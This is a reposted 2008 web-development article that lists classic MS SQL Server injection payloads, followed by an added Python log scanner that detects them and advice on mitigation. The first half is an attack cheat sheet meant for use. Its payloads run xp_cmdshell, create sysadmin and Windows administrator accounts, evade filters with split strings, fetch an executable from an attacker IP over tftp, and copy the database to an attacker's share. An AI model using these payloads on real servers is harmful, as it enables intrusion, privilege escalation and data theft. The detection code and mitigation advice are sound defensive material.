Very Classic MS SQL Injection Material
2008-10-04 11:10:32 Source: WEB开发网

Having obtained the web path d:\xxxx, continue with:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd(str image);--
The traditional test procedure when xp_cmdshell exists:
;exec master..xp_cmdshell 'dir'
If it is restricted, the following approach can be used:
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
http://www.xxx.com/list.asp?classid=1;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap /add'
http://localhost/show.asp?id=1';exec master..xp_cmdshell 'tftp -i youip get file.exe'-
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='\\你的IP\你的共享目录\bak.dat'
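Every payload above leaves the same footprint at the web tier: a `;` that terminates the application's own statement and starts a second one (use, create table, declare, exec, backup database), a reference to one of a handful of dangerous procedures (xp_cmdshell, sp_oacreate / sp_oamethod, xp_servicecontrol, sp_addlogin, sp_password, sp_addsrvrolemember), or an EXEC of a variable that was assembled from string fragments so that the procedure name never appears whole. The Python example below is added here as a defender's illustration and is not part of the original post: it normalizes a URL query string the way the database would see it (URL-decoding, whitespace folding, and merging `'xp_'+'cmdshell'`-style concatenations) and reports which indicators it finds, then runs that over a few constructed access-log lines in an IIS W3C-like field order. The log layout, the placeholder client addresses and the `classify` / `scan_log` names are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Extended/stored procedures that the injections on this page chain after a ';'.
DANGEROUS_PROCS = (
    "xp_cmdshell", "sp_oacreate", "sp_oamethod", "xp_servicecontrol",
    "sp_addlogin", "sp_password", "sp_addsrvrolemember",
)
# A ';' followed by a fresh statement inside a parameter marks a stacked query.
_STACKED = re.compile(r";\s*(use|create\s+table|backup\s+database|declare|exec)\b")
# Two adjacent string literals joined with '+', as in 'xp_'+'cmdshell'.
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# EXEC of a variable rather than of a literal procedure name.
_DYN_EXEC = re.compile(r"\bexec(?:ute)?\s+@")


def normalize(query: str) -> str:
    """Reduce a raw query string to the form the SQL parser would act on."""
    s = unquote_plus(query).lower()          # %27 -> ', + -> space
    s = re.sub(r"\s+", " ", s)               # fold tabs/newlines/multiple spaces
    while True:                              # merge 'a'+'b' until nothing is left to merge
        merged = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        if merged == s:
            return s
        s = merged


def classify(query: str) -> List[str]:
    """Return the indicators found in one query string (empty list if clean)."""
    s = normalize(query)
    hits = ["stacked:" + re.sub(r"\s+", " ", kw) for kw in _STACKED.findall(s)]
    hits += ["proc:" + proc for proc in DANGEROUS_PROCS if proc in s]
    if _DYN_EXEC.search(s):
        hits.append("dynamic-exec")
    return hits


# Constructed sample log lines (assumed W3C-like field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status; placeholder IPs).
SAMPLE_LOG = [
    "2008-10-04 11:10:32 10.0.0.5 GET /111.asp id=3400 200",
    "2008-10-04 11:10:40 10.0.0.5 GET /111.asp id=3400;use+ku1;-- 500",
    "2008-10-04 11:11:02 10.0.0.5 GET /show.asp id=1;exec+master..xp_cmdshell+%27dir%27 500",
    "2008-10-04 11:11:30 10.0.0.5 GET /show.asp "
    "id=1;declare+@a+sysname+set+@a%3D%27xp%27%2B%27_cm%27%2B%27dshell%27+exec+@a+%27dir+c:%5C%27 500",
    "2008-10-04 11:12:00 10.0.0.9 GET /list.asp classid=1 200",
]


def scan_log(lines) -> List[Tuple[str, str, List[str]]]:
    """Yield (client, uri-stem, indicators) for every line whose query string is suspicious.
    Assumes the query field contains no literal spaces (W3C logs encode them as '+')."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) < 7:
            continue                         # malformed or truncated line
        _date, _time, client, _method, stem, query, _status = parts[:7]
        hits = classify(query)
        if hits:
            alerts.append((client, stem, hits))
    return alerts


if __name__ == "__main__":
    for client, stem, hits in scan_log(SAMPLE_LOG):
        print(f"{client} {stem}: {', '.join(hits)}")
```

Matching on normalized input rather than on the raw URL is what catches the split-string variants near the end of the list; a filter that looks for the literal text `xp_cmdshell` misses `'xp'+'_cm'+'dshell'` entirely. Detection of this kind is a tripwire, not a fix: the durable mitigations are parameterized queries in the ASP pages, a database login that is not sysadmin and cannot reach master, and leaving xp_cmdshell and the OLE Automation procedures disabled via sp_configure.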